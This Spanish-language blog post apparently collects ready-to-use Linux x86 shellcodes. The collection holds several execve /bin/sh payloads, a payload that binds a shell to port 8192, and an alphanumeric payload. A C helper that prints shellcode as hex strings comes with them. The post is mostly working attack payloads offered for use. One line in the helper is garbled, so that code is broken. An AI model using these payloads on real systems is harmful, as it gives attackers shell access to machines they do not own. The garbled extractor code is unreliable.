/* Variable definitions ==================== */ /* Use this with templates/template-twocol.html */ -->

Chat-Kasper MH

Recopilacion de shellcodes / extractor

Posted by kasp3r11 13:35, under |

Aqui pego una recopilacion de scodes listas para ser usadas. Para
'extraerlas': nextract archivo.txt. Por cierto que todas son made by RaiSe
(algunas como la alfanumerica compartiendo ideas con Zer0 y Fatuo ;) ).

<++> shellcodes/sc-esp.c $8308a7a77bbe3103152344e40da5df0d
// scode '%esp' sobreescrito
char shellc[128]=
"\xeb\x1f\x5f\x89\xfb\x31\xc0\x88\x47\x07\x89\x7f\x08\x89\x47"
"\x0c\x8d\x4f\x08\x8d\x57\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xbc\xf0\xff\xff\xbf\xe8\xd7\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68";
<-->
<++> shellcodes/sc-oneline.c $cfec37c76b30001d337f80e7eb35b206
// scode sin retornos de linea
char shellc[128]=
"\xeb\x19\x5f\x89\x7f\x10\x31\xd2\x88\x57\x07\x89\x57\x14\x89"
"\xfb\x8d\x42\x50\x8d\x4f\x10\x83\xe8\x45\xcd\x80\xe8\xe2\xff"
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
<-->
<++> shellcodes/sc-mini.c $9d747e94e6be0a71682e2dd1ab6b77d8
// miniscode, 24 bytes
char shellc[128]=
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
<-->
<++> shellcodes/sc-portshell.c $ecba7d17930eb1b3d596b5eb21c431ce
// scode que enlaza una shell en el puerto 8192
char shellc[512]=
"\x4c\x4c\x4c\x4c\x5f\x89\xfc\x31\xc0\x89\xc3\xb0\x02\xcd\x80"
"\x39\xc3\x74\x05\x8d\x43\x01\xcd\x80\x31\xd2\x89\x57\x08\x42"
"\x89\x57\x04\x42\x89\x17\x89\xf9\x31\xdb\x43\x8d\x43\x65\xcd"
"\x80\x89\xc6\x31\xd2\x89\x17\xc6\x07\x02\xc6\x47\x02\x20\x89"
"\x57\x04\x89\x77\x08\x89\x7f\x0c\x89\x57\x10\xc6\x47\x10\x10"
"\x8d\x42\x66\x8d\x5a\x02\x8d\x4f\x08\xcd\x80\x89\x37\x89\x57"
"\x04\xc6\x47\x07\x01\x8d\x42\x66\x8d\x5a\x04\x89\xf9\xcd\x80"
"\x89\x57\x04\x89\x57\x08\x8d\x42\x66\x8d\x5a\x05\xcd\x80\x89"
"\xc3\x31\xc9\x8d\x42\x3f\xcd\x80\x8d\x42\x3f\x41\xcd\x80\x8d"
"\x42\x3f\x41\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
<-->
<++> shellcodes/sc-alfa.c $f9c01b11bf127c80454b55d2ea3525ef
// scode alfanumerica
// nop is 'E'
char shellc[128]=
"LLLLX3EX1EX1eX3eXjEX4EPh8eshXf5VJPheebiXf5JJPTYjYX4YPQTPUX"
"3HX1HX1XX3XXZYJf1UVBj8X0EW432G";
<-->
<++> shellcodes/scodes.h $7986750a103954c2ac983bee2abd34cd
// Extractor de shellcodes by RaiSe
// NetSearch Ezine
// Testeado en redhat 6.0

#define SIZE 2048
int printsc (int funcion)
{
int i,cc;
char dst[SIZE],buf[SIZE],*p;
p=(char *)funcion;
sprintf(buf,"%s",p);
p=dst;
printf("\nExtractor de shellcodes");
printf("\nRaiSe - NetSearch Ezine\nhttp://www.netsearch-ezine.com\n");
for(i=3;i<strlen(buf);i++)
 {
 sprintf(p,"%08x",buf[i]);
 *p=*(p+6);
 *(p+1)=*(p+7);
 p+=2;
 }
*p=0x00;
i=0;
printf("\nchar shellc[]=");
while(dst[i]!=0x00)
 {
 printf("\n\"");
 for(cc=0;cc<15;cc++)
  {
  if(dst[i]==0x00)  break;
  printf("file://x%25c%25c%22,dst[i],dst[i+1/]);
  i+=2;
  }
 printf("\"");
 }
printf(";\n\n");
return(1);
}
<-->

-------------------
by:    kasper11@masterhacks.net

Tags

Labels

Blog Archive

Blog Archive